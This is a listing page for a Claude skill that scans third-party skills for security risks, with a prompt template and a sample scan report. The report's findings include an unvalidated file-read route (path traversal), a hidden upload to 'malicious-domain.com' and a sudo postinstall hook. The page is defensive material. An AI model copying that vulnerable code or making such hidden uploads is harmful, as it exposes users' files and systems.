claude-skill-antivirus

🥈Silver

Claude Skill Antivirus is an AI automation tool that scans and secures third-party skills for Claude. It detects malicious patterns, data exfiltration, and dangerous operations before installation. Benefits operations teams by ensuring safe skill integration.

6300Updated 1mo ago

Intermediate30min to implementautomation

Saves ~25 min per use

Quick InstallView Source

git clone https://github.com/claude-world/claude-skill-antivirus.git

Works with:

Claude

Overview

About This Skill

How to Use

1. **Prepare the Skill**: Download or locate the third-party skill you want to scan. Ensure you have access to its source code or installation files. 2. **Run the Scan**: Use the prompt template above in your AI tool (e.g., Claude, ChatGPT) and replace the placeholders with the skill name and any specific concerns. For example: ``` Scan the third-party skill 'Claude-File-Uploader' for potential security risks using the following criteria: 1) Malicious code patterns, 2) Data exfiltration risks, 3) Dangerous operations. Focus on unauthorized file access. ``` 3. **Review the Report**: Analyze the AI-generated report for critical, high, and medium-risk findings. Pay special attention to code snippets, network calls, and privilege escalation risks. 4. **Take Action**: - For **critical/high risks**, block the skill and notify your security team. - For **medium risks**, request fixes from the skill developer or modify the skill yourself. - For **low risks**, document them for future reference. 5. **Automate Scans**: Integrate this skill into your CI/CD pipeline (e.g., GitHub Actions, GitLab CI) to automatically scan third-party skills before deployment. Use the prompt template in a script to generate reports for each pull request. **Tips for Better Results:** - Provide specific concerns (e.g., 'focus on network calls') to get more targeted results. - If the skill is obfuscated or minified, ask the AI to deobfuscate it first. - Cross-check the AI's findings with tools like `grep`, `strings`, or `yara` for additional validation.

Setup & Installation

Quick Install

No install command available. Check the GitHub repository for manual installation instructions.

Alternative Install (Git Clone)

git clone https://github.com/claude-world/claude-skill-antivirus

Requirements

Claude Code or compatible AI agent
Works with: Claude

Quick Start Guide

Install the Skill

Copy the install command above and run it in your terminal.

Open Your AI Agent

Launch Claude Code, Cursor, or your preferred AI coding agent.

Try It Out

Use the prompt template or examples below to test the skill.

Customize

Adapt the skill to your specific use case and workflow.

Usage Examples

Prompt Template

Scan the third-party skill '[SKILL_NAME]' for potential security risks using the following criteria: 1) Malicious code patterns (e.g., unauthorized file access, network calls to suspicious domains), 2) Data exfiltration risks (e.g., unexpected data transmission to external servers), 3) Dangerous operations (e.g., system command execution, privilege escalation). Provide a detailed report including identified risks, severity levels, and recommended mitigation steps. Focus on [SPECIFIC_CONCERN] if provided.

Example Output

### Security Scan Report: 'Claude-File-Uploader' Skill

**Scan Date:** 2024-05-15
**Skill Version:** 1.2.3
**Risk Level:** HIGH

#### **Critical Findings:**
1. **Unauthorized File System Access**
   - **Issue:** The skill includes a function `readFile()` that bypasses Claude's default sandbox restrictions, allowing access to `/etc/passwd` and user home directories.
   - **Evidence:** Code snippet found in `utils/fileHandler.js`:
     ```javascript
     const fs = require('fs');
     app.get('/readFile', (req, res) => {
       const filePath = req.query.path; // No validation
       res.send(fs.readFileSync(filePath, 'utf8'));
     });
     ```
   - **Risk:** Malicious actors could exploit this to exfiltrate sensitive system files.
   - **Severity:** CRITICAL (CVSS: 9.8)

2. **Hidden Network Call**
   - **Issue:** The skill makes an undocumented POST request to `https://api.malicious-domain.com/upload` whenever a file is uploaded, even when the user hasn't authorized it.
   - **Evidence:** Traffic captured in `network.log`:
     ```json
     {
       "endpoint": "/upload",
       "method": "POST",
       "body": {"file": "...", "userId": "12345"},
       "destination": "malicious-domain.com"
     }
     ```
   - **Risk:** User files are being sent to an unknown third party without consent.
   - **Severity:** HIGH (CVSS: 8.2)

3. **Privilege Escalation**
   - **Issue:** The skill requests `sudo` privileges during installation to modify system-wide configurations.
   - **Evidence:** `package.json` includes:
     ```json
     "scripts": {
       "postinstall": "sudo cp ./bin/cli /usr/local/bin/"
     }
     ```
   - **Risk:** Compromised skill could gain full system control.
   - **Severity:** CRITICAL (CVSS: 10.0)

#### **Recommendations:**
- **Immediate:** Block installation of this skill. Remove any already-installed instances.
- **Code Fixes:** 
  - Replace `fs` with Claude's sandboxed file API.
  - Remove the hidden network call and add explicit user consent for all external requests.
  - Remove `sudo` requirements; use user-level installation paths.
- **Monitoring:** Add this skill to your blocklist and scan all third-party skills with this tool before deployment.

**Conclusion:** This skill poses a severe security risk and should not be used in production environments.